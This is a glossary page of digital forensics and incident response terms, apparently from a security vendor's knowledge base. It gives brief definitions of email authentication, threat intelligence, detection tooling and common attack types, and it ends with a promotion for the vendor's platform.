Knowledge Base
A practical glossary of digital forensics and incident response concepts — explained for practitioners, linked to the tools that use them.
A DNS-based email authentication protocol that specifies which mail servers are authorized to send email on behalf of a domain.
An email authentication standard that uses public-key cryptography to verify that a message was sent and authorized by the owner of a domain.
An email authentication protocol that builds on SPF and DKIM to give domain owners control over how unauthenticated messages are handled and to enable abuse reporting.
Authenticated Received Chain (RFC 8617) preserves email authentication results across forwarding hops so receiving servers can evaluate the original authentication state.
The process of examining RFC 5322 email headers to trace a message's delivery path, verify authentication results, and identify anomalies indicating abuse or compromise.
Domains that substitute visually identical or near-identical Unicode characters for Latin letters to impersonate legitimate domains while appearing genuine to end users.
The forgery of email header fields—most commonly the From address—to make a message appear to originate from a sender other than its true source.
A phishing technique where the visible anchor text of an HTML email hyperlink shows a different URL than the actual href destination the user is sent to on click.
The process of augmenting raw indicators of compromise with contextual threat intelligence to assess their severity, origin, and relevance.
The continuous process of discovering, inventorying, and reducing an organization's externally exposed digital assets to minimize exploitable entry points.
Observable artifacts — such as IPs, domains, file hashes, URLs, file paths, and registry keys — that indicate a system or network may have been breached.
Evidence-based knowledge about existing or emerging cyber threats, used to inform and improve security decisions.
A public logging framework that records all SSL/TLS certificates issued by certificate authorities, enabling detection of unauthorized or suspicious certificates.
A historical record of DNS resolutions collected by network sensors, allowing analysts to query past domain-to-IP mappings without making active queries.
A protocol and distributed database system for querying domain registration information, including registrant details, registration and expiration dates, name servers, and registrar data.
A score or classification assigned to a domain based on historical behavior, threat intelligence associations, and observed malicious activity.
A score or classification assigned to an IP address based on observed malicious activity, abuse reports, and aggregated threat intelligence feeds.
The process of identifying, attributing, and documenting the tactics, techniques, infrastructure, and motivations of specific threat groups.
Practices and technologies for protecting DNS infrastructure and leveraging DNS data for threat detection, including DNSSEC, DNS filtering, and DNS-based authentication protocols.
Digital certificates issued by Certificate Authorities that authenticate a server's identity and negotiate encrypted communication channels between clients and servers.
Network ports on a host that are actively accepting connections, each exposing an underlying service that may be exploited if misconfigured, unpatched, or unnecessarily internet-facing.
The automated process of identifying known security weaknesses in systems, applications, and network infrastructure by comparing discovered services against vulnerability databases.
The forensic examination of suspected phishing emails to identify deceptive techniques, malicious infrastructure, and attribution indicators.
The scientific discipline of identifying, preserving, analyzing, and presenting digital evidence from computers, networks, and devices.
The organized approach to detecting, containing, eradicating, and recovering from security incidents.
The process of reconstructing a chronological sequence of events during a security investigation to understand the full attack chain.
The examination of system, application, and network logs to detect anomalies, reconstruct events, and identify indicators of compromise.
The process of examining malicious software to understand its behavior, origin, capabilities, and impact — including static analysis (without execution) and dynamic analysis (in a sandbox).
A globally accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations, used to understand, detect, and respond to cyber threats.
A vendor-agnostic, open standard for writing detection rules that can be converted to any SIEM query language.
A pattern-matching tool for identifying and classifying malware based on textual or binary patterns found in files.
The proactive, hypothesis-driven search for adversary activity that has evaded existing security controls.
The process of evaluating, prioritizing, and routing security alerts to determine which require investigation and which are false positives.
Security Information and Event Management — a platform that aggregates, correlates, and analyzes log data from across an organization's infrastructure to detect threats and support incident response.
Security Orchestration, Automation, and Response — platforms that automate security operations by connecting tools, running playbooks, and coordinating incident response workflows.
The practice of managing detection rules as version-controlled code, applying software engineering principles such as testing, peer review, and CI/CD to detection engineering.
The practices and controls for protecting application programming interfaces from unauthorized access, data exposure, and abuse.
A social engineering attack where adversaries hijack or spoof corporate email accounts to defraud organizations, redirect payments, or exfiltrate sensitive data.
A phishing technique that embeds malicious URLs inside QR codes to bypass text-based email security filters.
An attack where an adversary compromises a mailbox and replies to existing email threads to appear legitimate to recipients.
A targeted phishing attack directed at specific individuals or organizations, using personalized information to increase credibility and bypass skepticism.
The theft of usernames and passwords through fake login pages, keyloggers, or other deceptive methods designed to capture authentication credentials.
Registering domain names that are deliberate misspellings or minor variations of legitimate domains to deceive users navigating to trusted sites.
An attack that tricks users into granting a malicious application OAuth consent, giving attackers persistent account access without requiring the user's password.
Psychological manipulation techniques used to deceive people into divulging confidential information, granting access, or performing actions that compromise security.
Malware that encrypts files or locks systems and demands payment for restoration, often combined with data exfiltration as a double extortion tactic.
An attack that compromises a trusted third-party vendor, software provider, or service to gain indirect access to the ultimate target.
An attack strategy where an adversary compromises a website frequently visited by a specific target group to silently infect visitors with malware.
An attack method that systematically tries large numbers of passwords or cryptographic keys until the correct value is found, including variants like password spraying and credential stuffing.
A security risk originating from within the organization — employees, contractors, or partners who misuse their authorized access to cause harm.
DFIR Platform provides API-first tools for phishing analysis, exposure scanning, IOC enrichment, and AI-powered triage. Free tier included.
Try DFIR Platform Free